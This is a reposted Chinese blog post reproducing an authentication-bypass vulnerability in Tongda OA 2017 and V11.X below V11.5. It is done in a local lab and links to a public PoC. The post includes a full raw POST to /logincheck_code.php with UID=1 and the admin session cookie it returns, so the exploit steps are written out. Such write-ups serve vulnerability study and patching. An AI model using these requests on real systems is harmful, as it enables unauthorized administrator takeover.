通达OA任意用户登陆漏洞复现

栏目: IT技术 · 发布时间: 4年前

内容简介:通达OA 2017版通达OA V11.X<V11.5

影响版本

通达OA 2017版

通达OA V11.X<V11.5

环境搭建

安装包来自黑白之道(https://mp.weixin.qq.com/s/moxuMnaqzXg-tZ7_2oLxbQ)

下载安装包后一键安装即可

链接:

https://pan.baidu.com/s/1eel1BxEc0XE4PqlA7y7-Tw

提取码:ilj1

安装过程很简单故不再赘述

漏洞复现

初始用户:admin 密码:空

访问localhost可以看到登陆页面

说明我们环境已经ok了

我们可以先登陆进去,发现管理员后台地址都是如下格式

http://网站/general/index.php?isIE=0&modify_pwd=0

通达OA任意用户登陆漏洞复现

我们可以看到我们直接访问这个网址会显示我们没有登陆

然后我们利用poc生成我们的cookie并进行替换

Poc地址: https://github.com/NS-Sp4ce/TongDaOA-Fake-User

通过poc生成我们的cookie

通达OA任意用户登陆漏洞复现

来到我们之前的那个链接,打开F12进行cookie的替换

通达OA任意用户登陆漏洞复现

替换完之后重新刷新一下

通达OA任意用户登陆漏洞复现

可以看到我们成功的利用cookie登陆了进来

手动复现

访问 /general/login_code.php

通达OA任意用户登陆漏洞复现

获取返回的code_uid 注意注意!!这里要把cookie删除掉不然是无法获得道Set-Cookie 同时 要更换User-Agent!!

Post 发包

CODEUID=上一个数据包的code_uid&UID=1

通达OA任意用户登陆漏洞复现

数据包如下

POST /logincheck_code.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 104

Upgrade-Insecure-Requests: 1
Content-Length: 52

CODEUID={B33EE507-314D-EC90-6258-10D33F800BC9}&UID=1

返回包中的cookie

Set-Cookie: PHPSESSID=0ni6eptuu3595vlfan1aii61v4; path=/

源码分析

后面会补上


以上所述就是小编给大家介绍的《通达OA任意用户登陆漏洞复现》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

数据结构与算法分析

数据结构与算法分析

Frank.M.Carrano / 金名 / 清华大学出版社 / 2007-11 / 98.00元

“数据结构”是计算机专业的基础与核心课程之一,Java是现今一种热门的语言。本书在编写过程中特别考虑到了面向对象程序设计(OOP)的思想与Java语言的特性。它不是从基于另一种程序设计语言的数据结构教材简单地“改编”而来的,因此在数据结构的实现上更加“地道”地运用了Java语言,并且自始至终强调以面向对象的方式来思考、分析和解决问题。 本书是为数据结构入门课程(通常课号是CS-2)而编写的教......一起来看看 《数据结构与算法分析》 这本书的介绍吧!

随机密码生成器
随机密码生成器

多种字符组合密码

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试